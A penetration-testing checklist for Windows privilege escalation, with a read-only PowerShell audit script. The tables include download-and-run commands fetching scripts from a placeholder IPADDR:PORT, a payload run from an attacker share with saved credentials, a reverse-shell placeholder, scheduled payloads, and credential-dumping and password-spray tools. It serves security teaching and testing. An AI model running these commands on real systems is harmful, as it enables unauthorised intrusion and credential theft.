Windows Privilege Escalation Checklist
Introduction
Privilege escalation is a crucial step in the penetration testing lifecycle. This checklist is intended to cover the main vectors used in Windows privilege escalation, together with some of my personal notes from previous penetration tests.
Manual Checks
| Command/Action | Description |
|---|---|
| `systeminfo`; `whoami /all`; `net users`; `netstat -ano`; `ipconfig /all`; `tasklist` etc. | Perform basic information gathering steps. |
| `type c:\sysprep.inf`, `type %WINDIR%\Panther\Unattended.xml` etc. | Check for files containing passwords or hashes. More info here. |
| `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` | Check for the "AlwaysInstallElevated" registry setting. If this is enabled it allows all users to install `*.msi` files as NT AUTHORITY\SYSTEM. More info here. |
| `accesschk.exe -uwqs "Authenticated Users" *` | Check for weak permissions in the OS. A writable service configuration allows a user to reconfigure the service and make it run an arbitrary executable. More info here. |
| Check for unquoted service paths | If services have unquoted service paths containing spaces, these can be used to run malicious executable files. More info here. |
| `whoami /priv` | Check for the SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege privileges. Juicy/Rotten Potato can be used to exploit these. More info here. |
| `cmdkey /list`; `runas /savecred /user:WORKGROUP\Administrator "\\IP\SHARE\EVIL.exe"` | Use the `runas` command to run commands as a privileged user using saved credentials. More info here. |
| `wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'` | Check if Windows Subsystem for Linux is enabled on the machine; if so, this can be exploited to get a bind/reverse shell. |
| `wmic qfe get Caption,Description,HotFixID,InstalledOn` | Check the patch level to find kernel exploits. Use `findstr` with the KB patch numbers to display installed patches and see if any are missing. |
| `PsExec.exe -i -s cmd.exe`; `.\psgetsys.ps1` | Check if we are a local admin; if so, we can escalate to NT AUTHORITY\SYSTEM. |
| `icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"` | Check if we have write access to the Startup folder. This can be used to run malicious executables. |
| `[System.IO.Directory]::GetFiles("\\.\pipe\")` | Check for named pipes. These can be exploited to obtain the privileges of a process connecting to them. |
| Insecure GUI apps | Check for GUI apps running as SYSTEM that allow a user to spawn a Command Prompt or browse directories. |
| `at 08:00 /interactive "C:\Windows\temp\Payload.exe"` | Create a scheduled task which will execute malicious code. |
| MS08-067, MS10-015, MS11-080, MS15-051, MS16-032, MS17-010, CVE-2019-1388 etc. | Check for Common Vulnerabilities and Exposures. |
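Two of the rows above (the AlwaysInstallElevated registry check and the unquoted service path check) are easy to get wrong by hand: the installer policy only takes effect when the value is 1 in both HKLM and HKCU, and a service path is only dangerous when it is unquoted and contains a space before the executable name. The following audit script is an added example written for this page, not a tool from the original checklist; it reports both conditions on the local host so the findings can be verified or remediated (quote the service `ImagePath` and clear the policy value). All function names are my own.

```powershell
# Added audit example (not part of the original checklist).
# Reports the AlwaysInstallElevated policy state and services whose
# binary path is unquoted and contains a space. Read-only; no changes are made.

function Test-AlwaysInstallElevated {
    # The policy is only effective when AlwaysInstallElevated = 1 in BOTH hives;
    # querying HKCU alone (as in the table) gives an incomplete picture.
    $keys = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $states = foreach ($key in $keys) {
        $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $value = if ($null -eq $item) { 0 } else { [int]$item.AlwaysInstallElevated }
        [pscustomobject]@{ Hive = $key.Split(':')[0]; Value = $value }
    }
    [pscustomobject]@{
        Enabled = (@($states | Where-Object Value -eq 1).Count -eq 2)
        Detail  = $states
    }
}

function Get-UnquotedServicePath {
    # Flag a service when its PathName is not wrapped in quotes AND the part
    # before ".exe" contains a space: the service control manager then tries
    # each prefix (C:\Program.exe, C:\Program Files\Vendor.exe, ...) in turn.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^\s*"' -and                        # not quoted
            $_.PathName -notmatch '^\s*[A-Za-z]:\\Windows\\' -and      # skip built-in services
            (($_.PathName -split '\.exe')[0] -match ' ')               # space before the .exe
        } |
        Select-Object Name, StartName, StartMode, PathName
}

# Report
$aie = Test-AlwaysInstallElevated
"AlwaysInstallElevated effective: $($aie.Enabled)"
$aie.Detail | Format-Table -AutoSize

$unquoted = @(Get-UnquotedServicePath)
"Services with unquoted paths containing spaces: $($unquoted.Count)"
$unquoted | Format-Table -AutoSize
```

Run it from a normal PowerShell session; no elevation is needed for either query. A service in the second list is only a real finding if a user can write to one of the intermediate directories, so follow up with `icacls` on each directory before reporting it.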
Automated Checks
| Command/Action | Description |
|---|---|
| `Watson.exe` | Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for privilege escalation vulnerabilities. |
| `winPEASany.exe`; `winPEASx64.exe`; `winPEASx86.exe` | Script used to check for common privilege escalation vulnerabilities on a target system. |
| `IEX (New-Object Net.WebClient).DownloadString('http://IPADDR:PORT/PowerUp.ps1')` | This script checks all common areas of misconfiguration that allow a regular user to get a local administrative or SYSTEM account. |
| `powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1` | JAWS is a PowerShell script designed to help quickly identify potential privilege escalation vectors on Windows systems. |
| `systeminfo > systeminfo.txt`; `wesng.py systeminfo.txt` | Tool based on the output of the `systeminfo` utility which provides the list of vulnerabilities the OS is affected by. |
| `Seatbelt.exe` | C# tool that performs a number of security-oriented "safety checks" relevant for both offensive and defensive security. |
| `beRoot.exe` | BeRoot(s) is a post-exploitation tool that checks common Windows misconfigurations to find a way to escalate privileges. |
| `IEX (New-Object Net.WebClient).DownloadString('http://IPADDR:PORT/Invoke-WCMDump.ps1')` | PowerShell script to dump Windows credentials from the Credential Manager. |
| `IEX (New-Object Net.WebClient).DownloadString('http://IPADDR:PORT/SessionGopher.ps1')` | PowerShell tool to find and decrypt saved session information for remote access tools (e.g. PuTTY). |
| `LaZagne.exe` | Application used to retrieve many passwords stored on a local computer by commonly used software. |
| `IEX (New-Object Net.WebClient).DownloadString('http://IP:PORT/DomainPasswordSpray.ps1')` | PowerShell tool to perform a password spray attack against users of a domain. |
| `windows-privesc-check2.exe --audit -a -o wpc-report` | Application that tries to find misconfigurations that could allow local unprivileged users to escalate privileges. |
Conclusion
Privilege escalation is a topic that can often scare beginners, due to the number of vectors and techniques that you are required to learn. With the above checklist you should be able to deal with most situations. However, don't rely entirely on checklists and automated scripts, as these can often fail or miss something; do your own research as well.